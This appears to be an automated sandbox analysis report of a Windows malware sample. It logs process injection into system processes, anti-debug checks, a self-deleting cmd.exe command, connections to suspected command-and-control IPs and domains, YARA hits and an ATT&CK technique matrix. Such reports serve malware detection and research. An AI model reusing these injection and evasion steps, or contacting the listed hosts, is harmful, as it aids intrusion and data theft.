          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01514F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01514F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01528794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01597794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01597794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01597794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01527E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0153AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0152766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0154A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01548E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0151E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_01558EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_015946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03952397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039553C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039D23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039D23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0392F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0392DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0392DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0395FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03952ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03952AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03925210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03943A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_03938A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0394B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_039E1229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\fooYgfbxno.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.89.61 80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.68.16.179 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeDomain query: www.lotsimprovements.com
          Source: C:\Windows\explorer.exeNetwork Connect: 209.15.40.102 80
          Source: C:\Windows\explorer.exeDomain query: www.chambaultfleurs.com
          Source: C:\Windows\explorer.exeDomain query: www.zyaxious.website
          Source: C:\Windows\explorer.exeDomain query: www.hofwimmer.com
          Source: C:\Windows\explorer.exeNetwork Connect: 61.14.208.3 80
          Source: C:\Windows\explorer.exeDomain query: www.mentalnayaarifmetika.online
          Source: C:\Windows\explorer.exeDomain query: www.doxofcolor.com
          Source: C:\Windows\explorer.exeNetwork Connect: 206.189.50.60 80
          Source: C:\Windows\explorer.exeDomain query: www.myamazonloan.net
          Source: C:\Windows\explorer.exeDomain query: www.huvao.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--hj2bz6fwvan2be1g5tb.com
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: CB0000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\fooYgfbxno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
          Source: C:\Users\user\Desktop\fooYgfbxno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
          Source: C:\Users\user\Desktop\fooYgfbxno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: DB2008
          Source: C:\Users\user\Desktop\fooYgfbxno.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\fooYgfbxno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3968
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread register set: target process: 3968
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3968
          Source: C:\Users\user\Desktop\fooYgfbxno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: explorer.exe, 00000003.00000000.271766128.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333612659.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.286969510.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000003.00000000.277137044.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.303144271.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333647226.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.287002544.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000003.00000000.333840057.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.287346524.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.272377256.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
          Source: C:\Users\user\Desktop\fooYgfbxno.exeQueries volume information: C:\Users\user\Desktop\fooYgfbxno.exe VolumeInformation
          Source: C:\Users\user\Desktop\fooYgfbxno.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\fooYgfbxno.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          Path Interception812
          Process Injection
          1
          Masquerading
          1
          Input Capture
          121
          Security Software Discovery
          Remote Services1
          Input Capture
          Exfiltration Over Other Network Medium1
